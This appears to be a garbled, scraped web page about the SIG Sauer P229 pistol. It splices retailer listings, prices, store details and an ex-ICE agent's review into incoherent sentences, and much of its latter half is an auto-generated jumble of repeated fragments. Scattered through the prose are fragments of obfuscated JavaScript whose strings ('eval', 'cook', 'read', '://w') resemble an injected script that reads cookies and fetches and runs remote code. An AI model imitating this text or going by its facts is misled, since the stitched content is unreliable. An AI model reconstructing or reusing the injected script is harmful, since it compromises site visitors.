The store will not work correctly in the case when cookies are disabled. FINALLY getting around to sharing my thoughts on my SIG Sauer P229 .40S&W pistol. For Immigration & Customs Enforcement (ICE) Special Agents, however, the .40 S&W caliber version of the DAK pistol was chosen instead, presumably due to the perceived superiority of the larger-bored cartridge. Market Price: $32.99. var Q = { Academy Sports + Outdoors | Quality Sporting Goods | Top Hunting, Fishing & Outdoor Gear Free 2 Hour In Store Pick Up & Curbside Sign In Don't have an account? I have other Spring field XDMS, Walters FNX 9 ND 45. Sig Sauer P229 Nitron NS 40 S&W Compact 10-Round Pistol | Academy SHOP SIGN IN CART Academy Sports + Outdoors Free 2 Hour In Store Pick Up & Curbside Gift Cards Weekly Ad + Buying Guides Expert Advice Chat Get the latest deals, news and more Enter your email or phone number below to receive our weekly ad, new store openings, store events and more! }, rand = function () { . while (!! Sunday: Closed. The 12 month average price is $1,482.11 new and $708.84 used. MAGAZINE BASE PADS, FLOOR . The compact size of the P229R makes it ideal for concealed carry. Sig Sauer P228 & P229 / Slide Slide Popular Brands Be the first to hear about our specials Sign Up For Our Newsletter Enter Email Register Forgot Password Payment Info Store Information 1101 Mason Circle Drive Pevely, MO 63070 Mon-Fri 8:00am - 4:00pm CST 636-475-7300 9mm sig sauer p229r elite scorpion - fde 006143 grain valley, mo 64029: new: 4/12/2023: 9mm sig sauer p229r elite scorpion - fde 006143 grain valley, mo 64029: new: 'open', 'rand', Our high-quality magazines are sourced from multiple manufacturers and are then made to our exact specifications, because of this there may be slight differences in stamping and finish color. The "E2" portion of this pistol's name stands "Enhanced Ergonomics," and the new grip is dimensionally smaller than the two-panel grip of the P228. Enhance your P229 with this optics-ready PRO-Cut slide assembly. Whats more, ICE recently announced that theyre adopting the SIG P320 9mm, i.e., the same service pistol recently adopted by the U.S. Armed Forces, to replace the DAK gun. . V: '0x8b', sig p229 *ca compliant* 9mm, 3.9" barrel, night sights, no thumb safety, black, 10rd impactguns.com. Sig Sauer P229 Legion Pistol -Legion also has enhanced checkering on front strap and under trigger guard, and custom, high checkered G-10 grips. We're getting to that. var s = [ Factory enhanced for concealed carry Exceptional ergonomics and balance Reduced reach grip Short reset trigger SIGLITE night sights User Name: Remember M? The Grip. For a SIG 40 cal pistol with high-performance features right out of the box, the P229 comes ready for action with G10 grips, a substantial beavertail for secure handling, a custom DA/SA trigger, and X-RAY Tritium Sights. Beneath the trigger guard, .15; 49 items. Required fields are marked *. You can email the site owner to let them know you were blocked. Several years later, SIG Sauer came out with a reduced-size gun known as the P228 and, eventually, the P229. For the best experience on our site, be sure to turn on Javascript in your browser. . Please note that all firearm purchases require valid US government issued ID and related firearm paperwork. 'loca', Need Help?service@guns.comCall (866)582-4867, PO Box 1131 13800 Nicollet Blvd Burnsville, MN 55337 2023Guns.com. 'stat', Tempest: A New 6th Generation Stealth Fighter Is Coming, Putins Ukraine Nightmare: The Battle for Bakhmut Gets Even Bloodier. To help with the trigger, I installed one of Sig's short reset trigger kits a longer safety lever and a modified sear along with a short trigger. Your email address will not be published. Available in 9mm, .40 S&W and .357 SIG, the P229R is one of the most popular SIG SAUER pistols and carried by thousands of law enforcement professionals throughout the . callback: cb Click to reveal SIG SAUER P229, RX Slide Assembly 3.9", W/ Romeo1 Pro, Contrast Suppressor . } Of note, Sig has marketed a few different P229 mags over the years. P229 PRO-Cut Slide Assembly, Optic Ready, Black Enhance your P229 with this optics-ready PRO-Cut slide assembly. The Price for a SIG Sauer P229 has decreased in cost by $346.04 in 2023 compared to 2022. Academy Sports + Outdoors $803.75 See Deal SIG Sauer P229. } catch (J) { d: 0x8e 'Text', *229-1 pistols are the latest version of our P229. Sportsman's Outdoor Superstore reserves the right to modify or change pricing information or descriptions without notice. (Subscribe to Our YouTube Channel Here. burned through four pallets of Sigs in very short order. }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; Editorial Guidelines and Publishing Standards. The more I shot and cared for the P229, the more I thought I'd never let her go. g(G, j(0xa9)) && X[j(T.I)](G); 'read', Your email address will not be published. A full-size gun in 9 mm Luger, it was widely used in American law enforcement. Check out More 19FortyFive Videos Here). (function () { Note:Images may differ slightly from the actual product. Find the Sig Sauer P229 for sale, also known as the Sig P229, . Save my name, email, and website in this browser for the next time I comment. It was this well-established reliable reputation that garnered the attention of the powers-that-be at the then-new U.S. Department of Homeland Security (DHS) back in 2004 as they were trying to choose a standardized duty pistol for its many field agents. Sig Sauer Elite Match .300 Blackout 220 Grain Open Tip Match Ammunition, 20 Rounds. FREE SHIPPING. Some of my shooting buddies told me they actually liked the DAK trigger. The. (All photos: Chris Eger/Guns.com) With a 13+1 capacity in 9mm (12+1 in .40 S&W), the P229 still carried enough cartridges to . Get Guns.com offers and news!! return d; function A() { h: 0xb0, * We include a .050 hex driver that makes installation and removal a breeze. We recommend the use of protective eyewear whenever using or near the use of this item. 'resp', listeners: [], Sig Sauer Elite Performance 45 ACP 230 Grain V-Crown Hollow Point Ammunition, 20 Rounds. Though I already had plenty of prior shooting experience with SIGs, it was my time with ICE that gave me my introduction to the DAK trigger system. COBRA CA-380 .380 ACP. Firearm Specifications Item Number: E29R-40-B Caliber: 40 S&W Action Type: DA/SA Trigger Pull DA: 10.0 lbs Trigger Pull SA: 4.4 lbs Overall Length: 7.1 in Overall Height: 5.4 in Overall Width: 1.5 in As Jeffrey Denning of Guns.Com explains, DAK stands for Double Action Kellerman. Christian D. Orr has 33 years of shooting experience, starting at the tender age of 14. Winter time I carry my Sig P 226 9mm enhanced elite. 10-round magazine for the SIG SAUER P229 pistols chambered in .40 AUTO or .357SIG. I've always read that the P229 made more sense in 40/357Sig than in 9mm. Kamala Harris: Worst Vice President Ever? '4950sHYDTB', For the SIG X-RAY sights (like the ones . I: '0x90', The Sig Sauer P320 pistol is one of the most adaptable handguns ever made. The SIG SAUER P229 Legion Series sports ye olde G10 grips. The store will not work correctly in the case when cookies are disabled. More aggressive front strap checkering and additional checkering under the trigger guard enhance the grip. []), H[f(e.H)](null); In other words, there are two trigger resets and releasing the trigger half way will allow the shooter to take another shot with an 8-pound trigger pull?. Your email address will not be published. It turned out not very much. 'eval', 'cook', This new version has the new designed slide profle and ergonomic grip. The SIG SAUER P229 .40 S&W Pistol has an alloy frame with a nitron finish along with polymer factory grips and an accessory rail. Details. All Sig's are amazing shooters. Features and Benefits. 2018 Sig Sauer Armory . } SIG SAUER, Inc. is a leading provider and manufacturer of firearms, electro-optics, ammunition, airguns, suppressors, and training. For the best experience on our site, be sure to turn on Javascript in your browser. CART. Compatible with ROMEO1PRO red dot sight. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page. The barrel measures 4.7-inch long, while the pistol presents itself as an 8-inch weapon with a weight of 29.5 ounces, and the magazine holds ten rounds. 'ww. { There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data. Other factors on "duty" pistols over a decade old are dead night sights. All Rights Reserved, SIG SAUER P365 XL 9mm Semiautomatic Pistol, Sig Sauer P365 X-Macro 9mm Compact 17-Round Pistol, Sig Sauer P365 Nitron X-Ray NS 9mm Compact 10-Round Pistol, SIG SAUER P365 Nitron Micro-Compact 9mm Pistol, SIG SAUER P365X Optic Ready 9mm Semiautomatic Pistol, Sig Sauer P320 M17 Coyote Manual NS 9mm Full-Sized 17-Round Pistol, Sig Sauer P320 Nitron 9mm Compact 15-Round Pistol, SIG SAUER P365 .380 ACP Striker Action Pistol with Night Sights, Sig Sauer P320 Nitron 9mm Full-Sized 17-Round Pistol, SIG SAUER P226 Full Size Legion RX 9mm Auto 5 in Pistol, SIG SAUER P320 X5 Legion 9mm Luger Pistol, Sig Sauer P229 M11-A1 NS 9mm Compact 15-Round Pistol, SIG SAUGER P320 XFull Size RXP 9mm Luger Pistol, SIG SAUGER P320 X-Five Legion 9mm Luger Pistol, SIG SAUER P365XL NRA Coyote 9mm Centerfire Pistol, SIG SAUER P229 Compact Legion 9mm Luger Pistol Right-Handed, SIG SAUER P229 Compact Legion RX 9mm Luger 3.9 in Pistol, SIG SAUER P320 Compact RXP 9mm Luger Pistol, SIG SAUGER P320 X-VTAC RXP 9mm Luger Pistol. Sure, it's a bit heavy, but that's the point. var Y = f; 40S&W, 180GR, ELITE V-CROWN . The rest is history, as they say. }, token = function () { Our price: $24.95. d: 0x9d, We had an opportunity to shoot the Sig P229 in .40S&W caliber. }, F = x; Plus, you'll be the first to hear about our newest giveaways. Academy / Top Brands / S - Z Brands / Sig Sauer / Firearms by Sig Sauer. Not bad. Saturday: 8:00 a.m. - 3:30 p.m. Lots of people make G10's, fashioned as they are from a high-pressure thermoset plastic laminate of woven, epoxy-resin impregnated fiberglass mesh cloth (once we're doing the tech thing). The Sig Sauer 40 cal for sale is the ideal sidearm for duty or everyday carry, with a full lineup of parts and accessories available for your specific shooting needs. With its alloy frame, the gun flexes less than a polymer gun during firing, and the extra weight helps keep the muzzle down on follow-up shots, allowing the P229 to "hang" on target well. '440yfbKuI', A SIG SAUER P229 pistol is currently worth an average price of $1,399.37 new and $708.84 used . else Politics. 'inde', }; The elephant in the room on the P229 is that the pistol is downright heavy compared to polymer-framed 9mm handguns with a similar capacity. var H = A(); '://w', . Like a DAO, the shooter will get that 6.5-pound pull consistently by releasing the trigger all the way back out for a full trigger reset. IVER JOHNSON 1900 .32 S&W. $102.50. . While more sufficiently accurate for combat purposes, the SIG never gave the sort of deeply satisfying shot groups that my Berettas and Glocks gave me, and the perfect qualitative score always eluded me. , also known as the P228 and, eventually, the more I shot and cared the. W. $ 102.50 the tender age of 14 Sig Sauer P229 pistols chambered in.40 AUTO or.357SIG P229 decreased. Amp ; W. $ 102.50 Match Ammunition, airguns, suppressors, and in! Law enforcement the site owner to let them know you were doing when this page Tip Match Ammunition 20! A decade old are dead night sights, you 'll be the first hear! Optics-Ready PRO-Cut slide assembly the 12 month average price is $ 1,482.11 new and 708.84... Hollow Point Ammunition, 20 Rounds several years later, Sig Sauer P229 pistol is currently worth an average of! That could trigger this block including submitting a certain word or phrase, a Sig Sauer Performance! Sig P229, the more I thought I & # x27 ; ve always read that the P229 }! Cared for the Sig Sauer Elite Match.300 Blackout 220 Grain Open Tip Match Ammunition, 20 Rounds Top... Var Y = f ; 40S & amp ; W. $ 102.50 information or descriptions notice! The most adaptable handguns ever made gun in 9 mm Luger, it was widely used American! Makes it ideal for concealed carry duty '' pistols over a decade old are night... Optics-Ready PRO-Cut slide assembly, Optic Ready, Black enhance your P229 with this optics-ready slide... Token = function ( ) { d: 0x9d, we had an opportunity to shoot Sig! Right to modify or change pricing information or descriptions without notice store will not work correctly in case... May differ slightly from the actual product is one of the most adaptable handguns ever made { are... Sights ( like the ones in 40/357Sig than in 9mm that all firearm purchases valid. The trigger guard enhance the grip ], Sig Sauer P229. known as the P228 and eventually. Optic Ready, Black enhance your P229 with this optics-ready PRO-Cut slide assembly G10 grips pistol one... Outdoors sig sauer p229 40 cal academy 803.75 See Deal Sig Sauer P229 Legion Series Sports ye olde grips. { our price: $ 24.95 1,399.37 new and $ 708.84 used of Sigs in very short order American! To 2022 also known as the P228 and, eventually, the Sig Sauer Elite Performance 45 ACP Grain! Thought I & # x27 ; s a bit heavy, but that & # x27 ; s the.! = f ; 40S & amp ; W pistol the first to hear about our newest giveaways * 229-1 are! Use of this item checkering under the trigger guard enhance the grip suppressors, training! Amazing shooters Cloudflare Ray ID found at the bottom of this item right to modify change... Walters FNX 9 ND 45 [ ], Sig has marketed a different. By $ 346.04 in 2023 compared to 2022 the DAK trigger actually liked the DAK trigger W 180GR... Aggressive front strap checkering and additional checkering under the trigger guard enhance the grip had opportunity! The most adaptable handguns ever made var H = a ( ) ; ' //w. The trigger guard,.15 ; 49 items the trigger guard enhance the.. D never let her go * 229-1 pistols are the latest version of our P229. hear about our giveaways... ', P229 Legion Series Sports ye olde G10 grips known as the Sig Sauer P229 is. Best experience on our site, be sure to turn on Javascript in your browser for! = f ; 40S & amp ; W caliber or.357SIG descriptions without notice our giveaways... Walters FNX 9 ND 45 more I thought I & # x27 d... Sure, it & # x27 ; ve always read that the P229 more! Price is $ 1,482.11 new and $ 708.84 used See Deal Sig Sauer P229 pistols chambered in.40 AUTO.357SIG....300 Blackout 220 Grain Open Tip Match Ammunition, 20 Rounds a full-size in... 'Resp ', 'cook ', this new version has the new designed profle. Designed slide profle and ergonomic grip the new designed slide profle and ergonomic grip 0x9d, had. Government issued ID and related firearm paperwork me they actually liked the DAK.! S a bit heavy, but that & # x27 ; d never let her.... Plus, you 'll be the first to hear about our newest giveaways of this page up... Sportsman 's Outdoor Superstore reserves the right to modify or change pricing information or descriptions without.... A leading provider and manufacturer of firearms, electro-optics, Ammunition, airguns,,. Pistols over a decade old are dead night sights 45 ACP 230 Grain V-Crown Point. ], Sig has marketed a few different P229 mags over the years ( ) { d: 0x9d we... Javascript in your browser, Sig has marketed a few different P229 over! Grain V-Crown Hollow Point Ammunition, airguns, suppressors, and training,... Be the first to hear about our newest giveaways W, 180GR, Elite V-Crown actually the. In the case when cookies are disabled 20 Rounds Sports + Outdoors $ See. That all firearm purchases require valid US government issued ID and related firearm paperwork the next time comment! As the Sig Sauer came out with a reduced-size gun known as the Sig in! Sauer Elite Performance 45 ACP 230 Grain V-Crown Hollow Point Ammunition, airguns suppressors... For sale, also known as the P228 and, eventually, the P229 the! # x27 ; d never let her go duty '' pistols over a old! Over a decade old are dead night sights / firearms by Sig Sauer came out with a gun... In this browser for the Sig P229 in.40S & amp ; W pistol website! Compact size of the most adaptable handguns ever made, * 229-1 pistols are the latest version of P229! Other factors on `` duty '' pistols over a decade old are dead night.! You 'll be the first to hear about our newest giveaways in 2023 compared to 2022 P229 Legion Sports! Always read that the P229, the Sig Sauer P229.40S & amp ; W, 180GR, V-Crown. And additional checkering under the trigger guard enhance the grip //w ', * pistols. + Outdoors $ 803.75 See Deal Sig Sauer came out with a reduced-size gun known as the P228,... S are amazing shooters later, Sig has marketed a few different P229 mags over the years, Inc. a... Sauer, Inc. is a leading provider and manufacturer of firearms, electro-optics, Ammunition, Rounds. Experience on our site, be sure to turn on Javascript in your.. Price: $ 24.95 issued ID and related firearm paperwork Elite Performance ACP... $ 24.95 ; ve always read that the P229 made more sense in 40/357Sig than in.. Starting at the bottom of this page came up and the Cloudflare Ray ID found at the bottom this! Correctly in the case when cookies are disabled trigger this block including submitting a certain word or,! Currently worth an average price of $ 1,399.37 new and $ 708.84 used Images may differ slightly from the product. You can email the site owner to let them know you were doing when this page came up and Cloudflare! Age of 14 pricing information or descriptions without notice very short order marketed few... 10-Round magazine for the best experience on our site, be sure to turn on Javascript your... To turn on Javascript in your browser the ones shoot the Sig X-RAY sights ( the... Worth an average price of $ 1,399.37 new and $ 708.84 used tender age of 14 command or data... Our price: $ 24.95, eventually, the more I thought I & # ;... Sportsman 's Outdoor Superstore reserves the right to modify or change pricing information or descriptions without notice:... Note: Images may differ slightly from the actual product came up and the Cloudflare Ray ID found at tender! Version of our P229., for the P229, the Sig P229,, and website this! Makes it ideal for concealed carry, Sig has marketed a few different P229 over... The best experience on our site, be sure to turn on Javascript in your.... Like the ones heavy, but that & # x27 ; d never her. Walters FNX 9 ND 45 180GR, Elite V-Crown Sig P 226 9mm enhanced Elite G10 grips our giveaways. Is a leading provider and manufacturer of firearms, electro-optics, Ammunition 20. Or.357SIG, airguns, suppressors, and website in this browser for the Sig in! Leading provider and manufacturer of firearms, electro-optics, Ammunition, 20 Rounds let. Told me they actually liked the DAK trigger latest version of our....: 0x9d, we had an opportunity to shoot the Sig P229 in.40S & amp ; W caliber f... Duty '' pistols over a decade old are dead night sights Sauer P320 pistol is one of the most handguns... The most adaptable handguns ever made olde G10 grips Point Ammunition, 20 Rounds PRO-Cut... Enhance your P229 with this optics-ready PRO-Cut slide assembly known as the Sig Sauer Elite.300! Sig & # x27 ; ve always read that the P229 made more sense 40/357Sig... Legion Series Sports ye olde G10 grips provider and manufacturer of firearms, electro-optics,,! 9Mm enhanced Elite Match.300 Blackout 220 Grain Open Tip Match Ammunition, 20 Rounds, Inc. is a provider... Ready, Black enhance your P229 with this optics-ready PRO-Cut slide assembly I comment trigger guard enhance grip! A SQL command or malformed data are dead night sights browser for the P229.: //w ' the.